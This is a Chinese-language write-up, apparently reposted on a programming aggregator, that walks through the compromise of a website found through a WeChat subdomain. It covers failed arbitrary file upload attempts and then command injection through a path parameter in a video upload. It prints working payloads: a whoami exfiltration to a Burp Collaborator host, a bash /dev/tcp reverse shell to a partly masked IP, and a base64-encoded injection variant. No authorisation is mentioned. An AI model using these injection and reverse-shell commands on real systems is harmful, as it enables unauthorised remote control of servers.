概述
主站打开是这样的只有扫码登陆
尝试扫码提示未注册
查看js,网站用了webpack打包
所有请求都在
这个js里面
尝试寻找敏感接口无果
百度site:domain.com
注意到wx1子域,打开这个链接跳转到在微信打开
那就到微信打开,查看功能点发现一处上传,先上传正常图片
改最下面的filename,后缀不变
改上面的filename参数,发现应该是任意文件上传
因为在js中发现php的ueditor(访问文件不存在)
顾认为是php的站,于是上传php,成功上传
访问此php文件直接被下载回来,没有解析(文件在主站下)
此时想到的是这个目录不解析php文件,上传包中有一个path参数,想着将文件上传跨目录到网站根目录
先尝试随便命名一个文件夹,可以创建,访问文件也存在
尝试../ ..跨目录失败
后面尝试各种姿势还是没能跨目录,也尝试修改上传URI
把Image改为File,显示404
改为upload还是在原来那个目录
于是回头看,微信里的功能
找到一处视频上传,把图片改为mp4后缀上传抓包,发包直接报错
此时注意到报错返回的结果,是在执行视频解析的系统命令,注意到下面截图中的两个点
因为path可控那我是不是可以直接拼接命令呢,于是尝试拼接
| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net |
dnslog收到响应whoami执行结果为root,此时确定存在命令执行
直接反弹shell,服务器没收到
| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |
感觉是有特殊字符的原因,于是采用base64编码
tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash
监听的端口依然没收到响应
于是采用#注释后面的命令
tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash #
成功反弹shell,发现原来是node.js的站,难怪之前不解析
wx站
主站
此目录记录当时所做之尝试
其实一开始就应该注意到
Express是node.js的一个开发框架就不会在文件上传不解析那里搞那么久了
最后
以上就是平淡口红为你收集整理的从文件上传到命令注入的全部内容,希望文章能够帮你解决从文件上传到命令注入所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复